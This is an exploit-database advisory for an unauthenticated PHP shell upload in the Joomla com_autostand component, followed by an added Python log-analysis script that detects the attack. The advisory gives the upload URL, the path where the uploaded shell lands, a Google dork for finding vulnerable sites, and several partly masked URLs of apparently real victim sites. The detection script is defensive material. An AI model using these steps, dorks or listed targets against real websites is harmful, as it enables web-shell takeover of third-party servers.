Joomla com_autostand shell upload vulnerability

2012.11.14
Credit: Over-X
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: joomla com_autostand file upload
# Author: Over-X
# email: j1a@hotmail.de
# Vendor or Software Link: forum.joomla.org
# Version: v3
# Google dork: "inurl:com_autostand"
# Tested on: win Xp
-------------------------------------------------------------------------------
poc:
----
localhost/path/index.php?option=com_autostand&func=newItem

upload shell php and go 2 :
--------------------------
localhost/path/images/autostand/images/shell.php

examples:
http://www.kXXXahan.be//index.php?option=com_autostand&func=newItem
http://www.maXXXverdrive.ca//index.php?option=com_autostand&func=newItem
http://www.doXXXsupplies.com/index.php?option=com_autostand&func=newItem
http://vcXXXuto.com//index.php?option=com_autostand&func=newItem
---------------------------------------------------------------------------------------
Gre: Sec4ever.com & Damane2011 & Invectus & Kha&mix & 4chrf & ked Ans & Black_Specter & ms_dz & indoushka & jago-dz & L3b r1z & b0x & scorpion_tn

References:

http://forum.joomla.org/
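
A log check for the request sequence this advisory describes, added here as an example and not part of the original advisory: it flags clients that POST to the com_autostand newItem form and also receive a 2xx response for a script file under images/autostand/images/. The combined log format, the sample lines, the function names and the extension list are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = """\
198.51.100.7 - - [14/Nov/2012:10:01:02 +0000] "GET /index.php?option=com_autostand&func=newItem HTTP/1.1" 200 5120
198.51.100.7 - - [14/Nov/2012:10:01:40 +0000] "POST /index.php?option=com_autostand&func=newItem HTTP/1.1" 200 812
198.51.100.7 - - [14/Nov/2012:10:02:05 +0000] "GET /images/autostand/images/x.php HTTP/1.1" 200 64
203.0.113.9 - - [14/Nov/2012:10:03:00 +0000] "GET /images/autostand/images/car1.jpg HTTP/1.1" 200 40960
203.0.113.9 - - [14/Nov/2012:10:04:00 +0000] "GET /index.php?option=com_content&view=article HTTP/1.1" 200 9000
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_DIR = "/images/autostand/images/"   # upload location named in the advisory
# Assumed list of extensions a PHP handler may execute; also catches x.php.jpg.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.IGNORECASE)

def classify(target):
    """Return 'form', 'script' or None for one request target."""
    path, _, query = target.partition("?")
    params = parse_qs(query)
    if params.get("option") == ["com_autostand"] and params.get("func") == ["newItem"]:
        return "form"
    path = re.sub(r"/+", "/", path)  # normalise doubled slashes
    if path.lower().startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
        return "script"
    return None

def find_suspects(log_text):
    """Map client IP -> list of (time, kind, method, target, status) findings."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, when, method, target, status = m.groups()
        kind = classify(target)
        if kind:
            hits.setdefault(ip, []).append((when, kind, method, target, status))
    return hits

def confirmed(hits):
    """IPs that POSTed to the form and also got a 2xx for a script in the upload dir."""
    out = []
    for ip, events in hits.items():
        posted = any(k == "form" and meth == "POST" for _, k, meth, _, _ in events)
        ran = any(k == "script" and st.startswith("2") for _, k, _, _, st in events)
        if posted and ran:
            out.append(ip)
    return sorted(out)
```

A 2xx response for any script under the upload directory is worth investigating on its own; a hardened server would not serve executable content from an image directory at all.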



Copyright 2024, cxsecurity.com

 
